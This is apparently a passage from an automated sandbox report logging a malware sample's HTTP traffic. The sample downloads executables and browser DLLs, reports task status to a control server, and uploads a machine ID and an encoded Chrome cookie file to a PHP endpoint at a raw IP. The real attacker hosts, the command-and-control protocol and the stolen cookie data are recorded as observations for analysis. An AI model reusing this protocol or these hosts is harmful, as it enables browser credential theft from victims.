Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="mode"5------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIIEGHDGDBFIDGHDAFHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 2d 2d 0d 0a Data Ascii: ------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="mode"51------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="task_id"1253402------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="status"1------HIIIIEGHDGDBFIDGHDAF--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="mode"51------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="task_id"1253403------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="status"1------KJKKKJJJKJKFHJJJJECB--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2ae906657_snd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="mode"51------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="task_id"1253404------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="status"1------HDBGHDHCGHCAAKEBKECB--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="mode"6------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="hwid"54A50671C48A3788952882------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build"default------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: cowod.hopto.orgContent-Length: 3181Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 2d 2d 0d 0a Data Ascii: ------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="message"browsers------HJDAFIEHIEGDHIDGDGHD--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"plugins------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="message"fplugins------BKJEGDGIJECGCBGCGHDG--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEHost: 46.8.231.109Content-Length: 7787Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIEHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 2d 2d 0d 0a Data Ascii: ------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="file"------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file"------EHJKFCGHIDHCBGDHJKEB--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
